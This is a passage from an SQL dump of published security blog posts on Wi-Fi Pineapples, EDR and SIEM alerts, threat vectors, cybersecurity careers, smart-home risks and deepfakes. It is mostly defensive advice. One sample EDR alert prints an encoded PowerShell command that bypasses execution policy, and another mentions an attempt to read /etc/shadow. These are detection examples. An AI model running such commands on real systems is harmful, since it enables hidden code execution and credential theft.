Attacks\n\nWi-Fi Pineapples pose significant threats to any environment where Wi-Fi is accessible. Here are real-world examples to illustrate how they’ve been used:\n\n### 1. Coffee Shop Surveillance\n\nA cybercriminal sits in a coffee shop with their Wi-Fi Pineapple. 
As customers connect to what they believe is the café\'s free Wi-Fi, the attacker intercepts login credentials for banking apps and social media platforms.\n\n### 2. Corporate Espionage\n\nAttackers impersonate a secure office network, tricking employees into connecting to their rogue AP. This enables the attacker to exfiltrate sensitive corporate data.\n\n### 3. Conference Exploits\n\nLarge public events such as tech conferences present easy targets. Attendees connect to what they think is the event Wi-Fi. Hackers use Pineapples to inject malicious programs or monitor unencrypted emails.\n\nThese examples indicate how a seemingly innocuous device can disrupt personal security and corporate networks alike.\n\n## Best Practices for Protection: Security Measures and Tools\n\nFortunately, you can protect yourself and your organization from Wi-Fi Pineapple-enabled attacks. Implement the following best practices:\n\n### 1. Avoid Public Wi-Fi Whenever Possible\n\nPublic networks lack security and make you vulnerable to rogue APs. Use your mobile hotspot or a known secure network instead.\n\n### 2. Use a VPN\n\nA Virtual Private Network (VPN) encrypts your internet traffic. Even if an attacker intercepts it, they won’t be able to decipher sensitive data.\n\n### 3. Beware of Rogue APs\n\nTurn off auto-connect to networks in your device’s settings. Manually verify the legitimacy of Wi-Fi networks before connecting.\n\n### 4. Enable HTTPS\n\nEnsure that every website you visit uses HTTPS encryption. Tools like HTTPS Everywhere (a browser extension) enforce this, creating a secure connection.\n\n### 5. Add Strong Endpoint Protection\n\nInstall antivirus and antimalware programs across your devices. Many endpoint security tools alert you to suspicious activity initiated by MITM tactics.\n\n### 6. Educate Employees\n\nFor businesses, invest in cybersecurity awareness training. Equip employees to recognize phishing schemes and rogue AP strategies.\n\n### 7. 
Use MAC Address Filtering\n\nOn sensitive networks, permit access only to known devices using MAC address filtering. While not foolproof, it’s another layer of security.\n\nBy following these tactics, individuals and companies can significantly reduce vulnerabilities.\n\n## The Future of Wi-Fi Security and Pineapple Devices\n\nWhile devices like the Wi-Fi Pineapple are unlikely to disappear anytime soon, advancements in network security continue to evolve:\n\n- **Wi-Fi 6 Encryption**: New standards, such as WPA3 in Wi-Fi 6, aim to improve encryption and prevent data sniffing.\n- **AI-Driven Security**: Automated threat detection using artificial intelligence can monitor network traffic in real-time for suspicious activities.\n\nThese advancements promise a more secure future in the face of evolving threats.', '', 'http://infoseclabs.io/uploads/1767499500376-718819269.png', NULL, 1, 'published', '2026-01-06 11:04:00', '2026-01-08 01:43:04', 'Projects', 'Protect Yourself from Wi-Fi Pineapple Attacks', 'Learn how to safeguard against Wi-Fi Pineapple attacks with effective security measures and insights into MITM threats.', 'Wi-Fi Pineapple'),
(10, 'Top EDR Alerts Every Organization Encounters and How to Handle Them', 'top-edr-alerts-every-organization-encounters-and-how-to-handle-them', '# Understanding Endpoint Detection and Response (EDR) Alerts\n\nEndpoint Detection and Response (EDR) is a critical component of modern cybersecurity strategies. With the rise of sophisticated cyber threats targeting endpoints such as laptops, servers, and mobile devices, EDR tools help detect, analyze, and respond to potential risks in real-time. However, managing EDR alerts can often feel overwhelming due to the sheer volume of notifications generated in an enterprise environment.\n\nThis post explores the most common categories of EDR alerts, provides examples of key alerts organizations typically encounter, and shares best practices for analyzing, prioritizing, and responding effectively. Whether you\'re a security analyst working in a SOC or an IT professional overseeing endpoint security, this guide will help you navigate the EDR alert landscape with confidence.\n\n## Why EDR Alerts Matter\n\nWhy are EDR alerts so critical to an organization\'s security posture? Simply put, endpoints are common entry points for attackers. Malicious actors often use techniques such as phishing emails, malware, or compromised credentials to gain access to endpoints before moving laterally across a network.\n\nEDR tools monitor endpoint activities, log suspicious behaviors, and send alerts when potential threats are detected. These alerts highlight risks such as malware infections, unauthorized file access, and anomalous network behavior. Ignoring or mismanaging these alerts could allow attackers to escalate their operations undetected, causing significant damage to your business.\n\n## Common EDR Alert Categories\n\nTo efficiently manage EDR alerts, it’s important to first understand their key categories. 
These alerts typically fall under the following types:\n\n### Malware Detection\n\nAlerts related to known or suspected malware activity, such as ransomware, trojans, or spyware. These often stem from signature-based detections or anomalous behaviors.\n\n### Suspicious Process Execution\n\nAlerts generated when an unusual or unauthorized process runs on an endpoint. Examples include PowerShell abuse or launching a process from unexpected directories.\n\n### Unusual User Behavior\n\nBehavioral anomalies such as a user accessing sensitive data at unusual hours or failed login attempts from unfamiliar locations often trigger alerts.\n\n### File Integrity Variations\n\nActivities such as unauthorized changes, additions, or deletions of critical system files or registries send file integrity alerts. These can indicate attempts to tamper with systems.\n\n### Network Anomalies\n\nUnusual traffic patterns between endpoints or outbound connections to suspicious external IP addresses result in network-related alerts.\n\n### Privilege Escalation Attempts\n\nAlerts flag actions where a user or process attempts to gain elevated access privileges without authorization.\n\n## Top EDR Alert Examples\n\nLet\'s take a closer look at specific EDR alert examples and their significance in an enterprise security environment.\n\n### Example 1: Ransomware Behavior Detected\n\n- **Alert Description**: Files are being renamed with “.encrypted” extension, indicating potential ransomware activity.\n- **Details**:\n  - Process Name: `encryptor.exe`\n  - Detected Behavior: Mass file encryption in user directories.\n  - Host Machine: `Workstation-22`\n- **Action Required**:\n  - Isolate the endpoint immediately.\n  - Identify the ransomware strain and retrieve backups.\n  - Perform a root-cause analysis to prevent recurrence.\n\n### Example 2: PowerShell Command-Line Anomaly\n\n- **Alert Description**: Unusual PowerShell script execution detected on server.\n- **Details**:\n  - Command Line 
Argument: `powershell -exec bypass -enc [Base64 encoded payload]`\n  - User Account: `admin_temp`\n  - Timestamp: `2024-03-14 11:23 PM`\n- **Action Required**:\n  - Investigate execution context and user activity.\n  - Reverse engineer the encoded payload to detect malicious intent.\n\n### Example 3: Unauthorized Administrator Access\n\n- **Alert Description**: A non-admin user attempted to access privileged directories.\n- **Details**:\n  - Affected Directory: `/etc/shadow`\n  - Failed Logins Detected: 5 attempts\n  - Source IP Address: `192.168.1.45`\n- **Action Required**:\n  - Lock the user\'s account temporarily.\n  - Analyze source IP activity for brute-force attack patterns.\n\n### Example 4: Outbound Connection to Known Malicious IP\n\n- **Alert Description**: Host attempted to contact a blacklisted external IP address.\n- **Details**:\n  - (Further details would be provided here, but they were cut off in the original content.)\n\nUnderstanding these alerts and their implications can significantly enhance an organization\'s ability to protect its network infrastructure. Properly responding to EDR alerts ensures that potential threats are mitigated swiftly, reducing the risk of significant breaches.', '', 'http://infoseclabs.io/uploads/1767499662544-499873320.png', NULL, 1, 'published', '2026-01-10 03:06:00', '2026-01-13 01:09:10', NULL, 'Top EDR Alerts & Solutions for Organizations', 'Discover common EDR alerts and learn effective strategies to manage and respond to them, ensuring robust endpoint security.', 'EDR Alerts');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(11, 'Mastering SIEM Alerts: A Guide to Effective Management and Optimization', 'mastering-siem-alerts-a-guide-to-effective-management-and-optimization', '# Understanding and Managing SIEM Alerts\n\nSecurity Information and Event Management (SIEM) systems are foundational tools in modern cybersecurity. They provide critical insights into an organization\'s environment by collecting, analyzing, and prioritizing data from various sources. However, one of the main challenges for security analysts and Security Operations Center (SOC) teams is managing the sheer volume of alerts generated daily.\n\nThis post explores the most common SIEM alerts organizations encounter, including examples of critical alerts and how to prioritize, manage, and optimize your SIEM system effectively.\n\n## What Are SIEM Alerts and Why Are They Important?\n\nSIEM alerts are notifications generated by a SIEM system when it detects activity that matches preconfigured rules or anomalies in the monitored environment. These alerts help security teams address potential threats swiftly, thereby minimizing risks to the organization.\n\n### Why SIEM Alerts Matter\n\n- **Real-Time Threat Detection**: Alerts identify security incidents like network intrusions or unauthorized access as they occur.\n- **Less Downtime**: Early warning systems reduce the time to resolve critical vulnerabilities.\n- **Compliance**: SIEM tools help organizations meet regulatory requirements by providing detailed logging and reporting.\n\nWithout proper alert management, these tools can easily overwhelm teams with noise, making it challenging to differentiate true cyber threats from false positives.\n\n## Common Types of SIEM Alerts Organizations Receive\n\nSIEM systems can monitor a wide range of events, but certain types of alerts are more prevalent across organizations. Below are some categories that security analysts commonly encounter:\n\n### 1. 
Failed Login Attempts\n\n- **Why It Happens**: A user attempts to log in multiple times with incorrect credentials.\n- **Risk**: This often indicates a brute-force attack or an insider threat attempting unauthorized access.\n- **Example**: Multiple failed logins across different accounts within a short time frame.\n\n### 2. Unusual User Behavior\n\n- **Why It Happens**: A user deviates from their normal login patterns (e.g., accessing resources at odd hours).\n- **Risk**: A compromised account or insider threat.\n- **Example**: An employee who typically works in New York is suddenly logging in from an IP address in Eastern Europe at 3 AM.\n\n### 3. Malware Detection\n\n- **Why It Happens**: Malware signatures are detected on a workstation or server.\n- **Risk**: The malware could spread laterally across networks and exfiltrate data.\n- **Example**: A SIEM tool picks up logs from your antivirus software indicating the presence of files matching known ransomware hashes.\n\n### 4. Privilege Escalation Attempts\n\n- **Why It Happens**: Users or processes attempt to gain administrative privileges.\n- **Risk**: Privilege escalation is often an early step in more complex attacks like ransomware.\n- **Example**: A standard user suddenly tries to execute administrative commands without prior approval.\n\n### 5. Data Exfiltration\n\n- **Why It Happens**: Large volumes of sensitive data are transferred outside the organization’s internal network.\n- **Risk**: A clear sign of insider threats or external breaches.\n- **Example**: A file server sending gigabytes of data to an unknown external IP over a short duration.\n\n### 6. 
Unauthorized Access to Critical Systems\n\n- **Why It Happens**: Access attempts to systems housing sensitive data outside of permissible roles or hours.\n- **Risk**: A sign of malicious insider activity or an attacker leveraging stolen credentials.\n- **Example**: A user account attempts to access a database server containing financial records without prior authorization.\n\n### 7. Denial-of-Service (DoS) Attack Indicators\n\n- **Why It Happens**: A spike in network traffic results in a server becoming unresponsive.\n- **Risk**: Disruption of operations, affecting customer experience and internal workflows.\n- **Example**: Your SIEM correlates logs pointing to unusually high traffic originating from multiple IP addresses targeting a single web server.\n\n### 8. Suspicious File Modifications\n\n- **Why It Happens**: Critical system files are unexpectedly modified.\n- **Risk**: Could indicate ransomware encrypting files or malware embedding payloads.\n- **Example**: Unauthorized changes to key registry settings or .bat and .dll files.\n\nEach of these alerts represents distinct threats that require prompt investigation and action. However, not all alerts are created equal, and some demand more immediate attention than others.\n\n## How to Effectively Manage and Prioritize SIEM Alerts\n\nManaging SIEM alerts is like trying to sip from a firehose; you need a strategy to get the good out of it without being drowned by excessive information. Here’s how you can effectively manage and prioritize alerts:\n\n1. 
**Categorize Alerts by Severity**\n   - Divide alerts into categories such as critical, high, medium, and low based on the level of potential risk.\n   - For example, failed login attempts might be \"low priority\" unless they are widespread, while detected ransomware is \"critical.\"\n\nBy understanding and categorizing alerts effectively, security teams can focus on the most significant threats and ensure timely responses to protect their organizations.', '', 'http://infoseclabs.io/uploads/1767501764296-302552087.png', NULL, 1, 'published', '2026-01-06 07:43:00', '2026-01-06 16:10:10', 'Information Security', 'Top SIEM Alerts Organizations Face', 'Discover common SIEM alerts, their impact, and strategies to manage them effectively for enhanced cybersecurity.', 'SIEM alerts'),
(12, 'How Cyber Threats Infiltrate: Insight into Digital Security Risks', 'how-cyber-threats-infiltrate-insight-into-digital-security-risks', '# Navigating the Digital Threat Landscape\n\nThe digital world is buzzing with activity. Everywhere we go, invisible connections through Wi-Fi, Bluetooth, and other technologies surround us. However, lurking within that mix are sneaky cyber threats waiting for an opportunity to strike. Understanding how hackers exploit vulnerabilities in our digital lives is key to staying ahead of them.\n\nThis blog dives into common threat vectors and attack surfaces, breaking down how cyber threats operate and, more importantly, how you can protect yourself.\n\n## The Sneaky World of Threat Vectors\n\n### Messages as a Gateway\n\nMessages might seem harmless, but they can open doors for hackers. Emails, for example, are one of the oldest and most common ways attackers exploit our trust in digital communication.\n\n- **Phishing** works by tricking users into clicking malicious links or sharing sensitive information, often by imitating trusted sources like banks or tax authorities.\n- **Smishing** is the SMS version of phishing, where attackers send texts posing as delivery companies or other trusted entities, aiming to con you into revealing private details or downloading malware.\n- Even **instant messaging apps** with better security measures like end-to-end encryption aren\'t immune. Hackers may use infected files or social engineering tactics to compromise users.\n\n### Images Aren’t Always Innocent\n\nThink that image file is harmless? Think again. Hackers embed malicious code into image files, turning them into digital Trojan horses. Once opened, these files can trigger harmful actions like releasing ransomware or stealing your data.\n\n### Files Are Dangerous When Tampered With\n\nEvery file exchanged online, from documents to spreadsheets, could potentially carry malicious software. 
When you open an infected file, attackers can exploit weaknesses in your device to steal data, take over your system, or launch other forms of attack.\n\n### Voice Calls Can Be a Threat\n\nPhones haven\'t escaped the reach of cybercriminals. **Vishing** (voice phishing) tricks unsuspecting individuals by using caller ID spoofing to look like legitimate entities, such as your bank. Through convincing conversations, attackers aim to extract sensitive details like passwords or financial data.\n\n### Your USB Could Be a Trap\n\nUSB drives might seem innocuous, but they can act as digital landmines. Plugging in a tampered USB stick can spread malware to your system. Sometimes, hackers leave infected drives in public places, counting on curiosity to do the rest.\n\n## Vulnerable Software: An Open Invitation for Hackers\n\nOld or unpatched software is like having holes in the walls of your digital fortress. Vulnerabilities in software—from coding errors to outdated versions without security updates—can be exploited, enabling attackers to breach systems and steal sensitive data.\n\nOrganizations must regularly manage updates and patches to seal these vulnerabilities. Tools like **vulnerability scanners** proactively identify and address these gaps before hackers can exploit them.\n\n### Agent-Based vs. Agentless Scanning\n\n- **Agent-Based Scanning** installs software on devices to detect vulnerabilities and report them back to a central server.\n- **Agentless Scanning** requires no software installation but uses tools like Nmap and Wireshark to remotely scan systems.\n\nHackers often favor agentless methods for reconnaissance since they leave no traces, underscoring the need for organizations to scan their systems first.\n\n## Key Takeaways to Stay Secure\n\nUnderstanding how hackers exploit vulnerabilities allows you to stay vigilant and build strong defenses. 
Here are some tips to protect yourself online:\n\n- Always verify messages before clicking links or sharing information.\n- Use security software to detect hidden malicious code in files and images.\n- Keep all software up-to-date to patch vulnerabilities.\n- Never plug in USB drives you find in public places.\n- Be cautious of phone calls from unverified sources, even if they appear familiar.\n\nCybercriminals are constantly evolving their tactics, but with proactive measures, you can safeguard your digital life from their threats.', '', 'http://infoseclabs.io/uploads/1767560795113-590336718.png', NULL, 1, 'published', '2026-01-04 16:06:00', '2026-01-05 00:07:33', 'Information Security', 'How Cyber Threats Infiltrate Digital Security', 'Explore how cyber threats operate and learn strategies to protect yourself from digital security risks.', 'Cyber Threats'),
(13, 'Breaking Into Cybersecurity: A Realistic Guide for Aspiring Professionals', 'breaking-into-cybersecurity-a-realistic-guide-for-aspiring-professionals', '# Breaking into Cybersecurity: A Realistic Guide\n\nEntering the field of cybersecurity is one of the most exciting career paths in technology, but it’s not without its challenges. Many aspiring professionals start with the misconception that simply studying cybersecurity concepts, watching tutorials, or earning certificates will guarantee them a high-paying job in just a few months. While some may stumble upon opportunities, for most, the reality is far more demanding. This blog post will break down the common missteps and guide you on how to effectively pave your way into the cybersecurity world.\n\n## The Problem with \"Study-Only\" Approaches\n\nOne of the biggest mistakes beginners make is focusing solely on learning concepts from college courses, books, or tutorials without applying them. Memorizing cybersecurity principles may give you a theoretical understanding, but it doesn’t equate to the hands-on experience that employers are looking for.\n\nThis phenomenon can leave you in what’s called \"learning purgatory.\" You might know all the right terminology and theories, but you’ll stumble when it’s time to apply your knowledge in a real-world scenario.\n\n**Reality check:** To stand out in interviews and secure your first cybersecurity role, you must demonstrate practical, hands-on experience. Employers want to see proof that you can not only explain cybersecurity concepts but also implement and troubleshoot them in real scenarios.\n\n## The Misleading Perception of \"Easy Tech Jobs\"\n\nWe\'ve all seen videos that glamorize tech jobs, making it seem like professionals spend their days sipping coffee, playing video games, and working out between 10-minute meetings. 
While entertaining, these portrayals create a false perception that tech jobs, including cybersecurity, are effortless to attain and maintain.\n\nTrue cybersecurity work involves rolling up your sleeves and getting your hands dirty with problem-solving, configuring systems, and handling unexpected errors. The path to landing a well-paying cybersecurity role is challenging and requires resilience, patience, and consistent effort.\n\n## Two Big Challenges to Overcome\n\nAnyone aspiring to break into cybersecurity faces two major hurdles:\n\n1. **Landing interviews.**\n2. **Securing the actual job after interviews.**\n\nThese are two entirely different challenges, each requiring a tailored approach. For interviews, you need to showcase a blend of knowledge and practical expertise. For the role itself, you must demonstrate your readiness to tackle real-world cybersecurity challenges.\n\n## How to Learn Cybersecurity the Right Way\n\nHere’s what sets successful cybersecurity professionals apart from those stuck in \"learning purgatory\":\n\n### 1. Focus on Practical, Hands-On Experience\n\nLearning about concepts like reverse shells is good. However, the true value lies in implementing these concepts:\n\n- Set up a lab environment at home with a server and endpoints.\n- Simulate real attacks and defense mechanisms, such as detecting reverse shells.\n- Deploy tools like a SIEM (Security Information and Event Management system) to learn how to monitor and defend against threats.\n\nThe more you work hands-on, the more these experiences will become ingrained, making them easier to recall during an interview or on the job.\n\n### 2. Start Small and Build Gradually\n\nYou don’t need to master complex tools like a SIEM or curate detection rules for your first entry-level cybersecurity job. 
Start small:\n\n- Learn the fundamentals of networking and cybersecurity basics.\n- Apply what you learn with simple projects, like setting up a basic firewall or analyzing traffic logs.\n- Gradually take on more challenging projects as your skills improve.\n\n### 3. Learn Through Troubleshooting\n\nMistakes are where the real learning happens. When setting up tools or environments, you’ll inevitably encounter errors. Instead of getting frustrated, use these moments to learn:\n\n- Debugging errors will teach you valuable lessons about system interaction.\n- Documentation and reading forums like Stack Overflow will become second nature.\n\n### 4. Understand the Value of Repetition\n\nRepetition is vital for mastering cybersecurity skills. If you’re learning about reverse shells, practice setting them up repeatedly until you could do it in your sleep. This kind of muscle memory will help you stand out in interviews and on the job.\n\n### 5. Utilize Learning Platforms\n\nToday, you have access to an abundance of affordable and comprehensive learning platforms:\n\n- **TryHackMe**\n- **Hack The Box**\n- **Key cyber labs**\n\nUse these platforms to perform practical exercises, submit findings, and gain experience in simulated environments.\n\n### 6. Be Persistent\n\nBreaking into cybersecurity takes more time and effort than many expect. Prepare to apply for numerous jobs, undergo multiple interview rounds, and continually build your skills. 
Persistence is key.\n\n## Hands-On Cybersecurity Examples\n\nTo put this into perspective, here’s a practical project you can work on:\n\n- **Reverse Shells:** Learn how attackers use reverse shells to execute code remotely.\n  - Set up an attack server and a victim machine.\n  - Simulate a reverse shell attack in your lab.\n  - Create detection rules for the reverse shell in your SIEM and test their effectiveness.\n\nThis project, while challenging, will give you unparalleled insights into how attacks work and what defenders need to do to stop them. Projects like these also provide valuable talking points for interviews.\n\n## The Importance of Realistic Expectations\n\nIt’s important to acknowledge that cybersecurity is not an easy field to break into, but it’s far from impossible. It requires:\n\n- Time\n- Consistent effort\n- Real-world, hands-on experience\n\nThere’s no shortcut or three-month boot camp that will magically land you a six-figure cybersecurity role. The candidates who stand out are the ones who actively apply what they learn, build on their skills, and remain patient in their job search.\n\n## Final Words of Advice\n\nIf you’re serious about a career in cybersecurity, here’s your priority list:\n\n1. Stop consuming endless videos and focus on practical work.\n2. Build projects, test exploits, and document your findings.\n3. Apply for jobs with a portfolio that demonstrates your skills.\n4. Be resilient, patient, and committed to learning.', '', 'http://infoseclabs.io/uploads/1767564505851-906926040.jpg', 'Aspiring cybersecurity professional learning from practical experience', 1, 'published', '2026-01-04 17:08:00', '2026-01-05 01:08:41', 'Information Security', 'Guide: Break into Cybersecurity Successfully', 'Discover realistic steps to enter cybersecurity, overcome challenges, and gain practical experience.', 'Cybersecurity career'),
(14, 'The Rise of Smart Homes: Convenience Meets Security Concerns', 'the-rise-of-smart-homes-convenience-meets-security-concerns', '# The Reality of Smart Home Security\n\nSmart homes are no longer a futuristic dream; they are now a part of everyday life. From smart thermostats and security cameras to voice assistants and lights you can control with your phone, the Internet of Things (IoT) has redefined how we live. It allows us to experience unprecedented convenience, energy efficiency, and connectivity within our homes.\n\nBut with this new convenience comes a growing question that tech enthusiasts and security-conscious consumers alike are grappling with: **Are smart homes truly safe?** IoT devices, while innovative, have inherent vulnerabilities that can expose your personal life to hackers and cybercriminals.\n\nThis post dives into the often-overlooked risks of IoT security, real-world examples of breaches, expert insights, and actionable steps to keep your smart home safe. By the end, you will have a clear understanding of the challenges and proactive measures needed to make your smart home smarter _and_ safer.\n\n## Understanding IoT Security Risks\n\nIoT devices, at their core, are compact computers linked through networks. These devices communicate data across the web, enabling seamless smart home automation. However, this connectivity is also their Achilles\' heel, making IoT devices prime targets for cyberattacks.\n\nHere are the most common vulnerabilities you should know about:\n\n### 1. Weak Passwords\n\nMany IoT devices come with factory-set passwords that are either easy to guess (e.g., \"admin\" or \"password123\") or shared across multiple devices. If left unchanged, these passwords act as an open invitation for hackers.\n\n### 2. Unencrypted Communication\n\nNot all IoT devices encrypt their data during transmission. 
This means sensitive information, like login credentials or video footage, could be intercepted by skilled attackers when communicated over networks.\n\n### 3. Lack of Software Updates\n\nIoT manufacturers often rush devices to market without a robust plan for updates. Without regular software patches, these devices remain vulnerable to emerging threats. A 2020 survey by Symantec showed that over 60% of IoT devices run outdated or insecure firmware.\n\n### 4. Universal Plug and Play (UPnP)\n\nWhile UPnP facilitates device interconnectivity, it can make devices visible to the internet, leaving them susceptible to unauthorized access. Think of it as leaving your front door unintentionally unlocked.\n\n### 5. Network Weaknesses\n\nIoT devices often operate over shared home networks. When attackers gain unauthorized access to one device, they can quickly move laterally into other connected devices, creating a domino effect.\n\n## Real-World Examples\n\nHistory has shown that these vulnerabilities are not just theoretical concerns; they\'ve been exploited in real and alarming ways.\n\n### 1. The Mirai Botnet Attack\n\nThe 2016 Mirai botnet infected insecure IoT devices like security cameras and baby monitors, assembling them into a massive botnet that launched one of the largest distributed denial-of-service (DDoS) attacks in history. It disrupted major websites like Twitter, Netflix, and PayPal.\n\n### 2. Hacking Smart Thermostats\n\nHackers have demonstrated their ability to take control of smart thermostats, as was publicly shown at the DEF CON cybersecurity conference in 2018. A compromised thermostat could not only disrupt comfort but even result in extreme energy costs.\n\n### 3. Unauthorized Surveillance\n\nSeveral cases have emerged where hackers gained access to smart home security cameras, spying on unsuspecting users. 
Perhaps one of the most harrowing incidents involved attackers who lashed out verbally at homeowners through hacked smart cameras like those by Ring.\n\n### 4. Stolen Data Logs\n\nVoice assistants that capture recordings of your conversations have been hacked, leading to unauthorized access to sensitive personal data. The Telesploit attack, for instance, proved that attackers could easily exploit Amazon Echo setups using Wi-Fi vulnerabilities.\n\nThese examples highlight the potential for IoT misuse, turning \"convenience\" into a threat.\n\n## Expert Opinions on IoT Security\n\nTo unpack the issue, we asked cybersecurity professionals for their insights on IoT safety. Here\'s what they had to say.\n\n### Dr. Emily Crane, Cybersecurity Researcher\n\n_\"IoT devices are often built faster than they\'re secured. Developers should design security into the software, but users also play a critical role by configuring their devices properly and updating them regularly.\"_\n\n### Mike Liu, Ethical Hacker\n\n_\"Most attacks are preventable with basic measures like strong passwords and segregated networks. However, we can\'t ignore the manufacturer\'s responsibility to ensure devices come with better encryption protocols and auto-update features.\"_\n\n### Jennifer Alvarez, Head of IoT Security at SecureShield\n\n_\"The IoT revolution is exciting but comes with an inherent trade-off between convenience and security. The only question is whether users and manufacturers will take the necessary steps to minimize risk before it\'s too late.\"_\n\n## Practical Security Measures\n\nThe good news is that securing your smart home is entirely attainable with the right steps. Here’s a practical checklist to make your IoT setup safer.\n\n### 1. Change Default Passwords\n\nImmediately replace factory-set passwords with strong, unique ones. A mix of uppercase letters, numbers, and special characters is ideal.\n\n### 2. 
Enable Two-Factor Authentication (2FA)\n\nWhenever possible, enable 2FA for an additional layer of protection beyond your password.\n\n### 3. Keep Your Firmware Updated\n\nRegularly check for and install updates on all IoT devices. If your device lacks update support, consider replacing it with one that does.\n\n### 4. Use a Separate Network for IoT Devices\n\nCreate a guest Wi-Fi network exclusively for your smart devices. Separating them from your primary network could limit exposure if one device gets hacked.\n\n### 5. Disable Unnecessary Features\n\nTurn off features like Universal Plug and Play (UPnP) unless absolutely necessary.\n\n### 6. Encrypt Your Network and Devices\n\nEnsure your Wi-Fi network is encrypted using WPA3 (or at least WPA2) protocols. Additionally, enable encryption on any device that allows it.\n\n## The Future of IoT Security\n\nIoT security is evolving, making it both exciting and daunting. Here’s what the future holds for the industry.\n\n### 1. AI-Driven Security\n\nArtificial intelligence is being integrated into IoT devices to detect and mitigate threats automatically. Smart threat detection services powered by AI algorithms could revolutionize end-user security.\n\n### 2. Standardization Efforts\n\nRegulators are stepping in to push for standard IoT security frameworks, ensuring comprehensive protections for consumers.\n\n### 3. Blockchain for IoT\n\nBlockchain technology may offer decentralized, tamper-proof security for IoT devices, reducing vulnerabilities in data transmission.\n\n### 4. 5G and Beyond\n\nWhile 5G speeds will supercharge IoT functionality, they will also open the gates for more complex cyberattacks. IoT security will need to evolve in tandem with connectivity upgrades.', '', 'http://infoseclabs.io/uploads/1767565053972-660878437.jpg', 'A modern smart home setup with connected IoT devices', 1, 'published', '2026-01-04 01:09:00', '2026-01-05 01:17:36', 'Information Security', 'Smart Homes: Convenience vs. 
Security Risks', 'Explore smart home security challenges and learn steps to protect your IoT devices from cyber threats.', 'Smart Home Security'),
(15, 'Deepfakes and Cybersecurity Risks: What You Need to Know', 'deepfakes-and-cybersecurity-risks-what-you-need-to-know', '# The Growing Threat of Deepfakes in Cybersecurity\n\nWith AI rapidly evolving, deepfakes have transformed from simple internet curiosities into significant cybersecurity threats. Their ability to forge realistic audio and video content puts individuals, organizations, and even governments at risk. But how do these AI-generated movies of deception actually work, what dangers do they pose, and most importantly, how can we fight back?\n\nThis article explores the intersection of deepfakes and cybersecurity, real-world examples of attacks, how they bypass security systems, and the tools and strategies experts recommend to detect and prevent them.\n\n## What Are Deepfakes?\n\nDeepfakes are AI-generated media that convincingly mimic real people\'s voices, faces, or behaviors. Created using **deep learning algorithms** like _generative adversarial networks (GANs)_, these forgeries can produce fake videos, audio, and even live streams that are almost indistinguishable from authentic recordings.\n\nFor instance, imagine a video where a high-profile CEO appears to announce false financial data, or a phone call where the \"voice\" of your manager requests an urgent wire transfer. These aren\'t hypothetical anymore; such deepfake attacks are happening now.\n\nWhile deepfakes can be used creatively—for entertainment, art, and training simulations—they pose significant risks when exploited maliciously.\n\n## Deepfakes and Cybersecurity: Understanding the Risks\n\nDeepfakes are no longer just tools for pranks or misinformation; they’re now a weapon in the arsenal of cybercriminals. Here’s why they’re such a growing concern in cybersecurity:\n\n### 1. Identity Fraud and Personal Risks\n\nDeepfakes can be used to impersonate individuals for phishing scams, such as creating fabricated videos of someone requesting sensitive corporate data. 
Worse, personal embarrassment and reputational harm caused by fake videos have been weaponized in cases like political defamation or revenge porn.\n\n### 2. Corporate Espionage\n\nCybercriminals can use deepfakes to impersonate executives or employees in video conferences to steal business secrets, authorize financial actions, or manipulate decisions.\n\n### 3. Disinformation Campaigns\n\nDeepfakes can influence public opinion by spreading disinformation during elections, protests, or corporate crises. This magnifies their potential as a tool for political or social manipulation.\n\n### 4. Eroding Trust\n\nWith deepfake technology becoming more sophisticated, it’s harder to distinguish truth from fiction. This \"truth decay\" affects trust in communications, digital evidence, and even democracy.\n\n## Real-World Examples of Deepfake Cyberattacks\n\nUnderstanding how deepfakes are exploited in real scenarios helps us better anticipate and address these risks. Here are five notable cases, along with measures that could mitigate similar attacks in the future:\n\n### 1. Deepfake Voice Scam on a UK CEO\n\nCybercriminals used AI-generated audio to mimic the voice of the CEO\'s boss, requesting a €220,000 transfer to a \"supplier.\" The attack was successful.\n\n**Preventative Measure**: Two-factor authentication and requiring written confirmation for financial transactions could have stopped this scam.\n\n### 2. Elon Musk-Deepfake Cryptocurrency Fraud\n\nDeepfakes of Elon Musk have been used in fabricated videos promoting fraudulent cryptocurrency schemes, tricking users into investing.\n\n**Preventative Measure**: Educating users about phishing red flags and introducing real-time deepfake detection tools can safeguard against such schemes.\n\n### 3. 
Deepfake Videos in Indian Elections\n\nDeepfake videos of political leaders were used to spread false campaign messages to promote divisive misinformation.\n\n**Preventative Measure**: Strengthening media literacy campaigns and fact-checking initiatives can help fight disinformation in politically charged contexts.\n\n### 4. Manipulated Security Footage\n\nDeepfake-altered surveillance footage was once demonstrated as a proof-of-concept to frame someone for crimes they didn’t commit, though thankfully not used in real trials.\n\n**Preventative Measure**: Blockchain systems verify authenticity by timestamping video metadata, making it tamper-proof.\n\n### 5. Social Media Exploitation\n\nCybercriminals have used doctored live streams to request donations or funds intended for fake causes.\n\n**Preventative Measure**: AI tools like ClearView or social media verification systems can be used to validate livestream sources.\n\n## Technical Analysis: How Deepfakes Bypass Security Measures\n\nDeepfakes rely on advanced neural networks that learn to mimic real-world data. Here’s why they can bypass traditional security defenses.\n\n### 1. Advanced AI Algorithms\n\nDeepfakes use _Generative Adversarial Networks (GANs)_ where one AI model generates fake content and another AI model evaluates its realism. This iterative process results in increasingly lifelike forgeries that fool both humans and AI detection models.\n\n### 2. Spoofing Techniques in Biometrics\n\nDeepfakes can deceive biometric authentication systems, such as facial recognition and voice verification, by providing high-definition, AI-generated replicas.\n\n### 3. Weak Detection Software\n\nMuch of the world’s current security software is optimized for older forms of attacks (e.g., ransomware). 
